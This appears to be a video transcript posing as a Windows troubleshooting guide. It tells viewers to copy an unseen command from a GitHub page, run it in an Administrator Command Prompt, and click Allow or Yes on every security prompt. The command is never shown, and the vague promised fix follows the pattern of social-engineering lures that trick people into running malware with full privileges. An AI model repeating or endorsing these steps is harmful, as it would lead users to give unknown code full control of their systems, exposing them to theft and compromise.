Hey everyone, welcome back to the channel. In today's video, I'm going to show you how to fix a common Windows issue quickly using a simple script from GitHub. This is great if your Windows is acting up, especially with system errors or network glitches. Let's walk through the steps carefully. Step 1. Open your browser. Start by launching Google Chrome or any browser you prefer. In the search bar, type github.com/command-fix. Then hit Enter. This will take you to a GitHub page created specifically to help with Windows issues. Once you're on the site, look for a section with a Windows heading. You'll see a script or a command written there. Once you've found the code, go ahead and highlight it, then right-click and copy it. This is the command we're going to run in Command Prompt. Or press the Windows key to bring up the search bar. Type in command. When Command Prompt appears in the search results, right-click on it and select Run as Administrator. Right-click inside the window to paste the code you copied from GitHub, then press Enter. The script will now begin executing. It may take a few seconds, and you might see a few pop-up notifications. These notifications may ask for confirmation. Click Allow or Yes on all of them so the script can make the necessary changes to your system. And that's it. Your Windows system should now be running more smoothly. Don't forget to like the video, subscribe to the channel, and leave a comment if you have any questions or need further help. Thanks for watching, and I'll see you in the next one.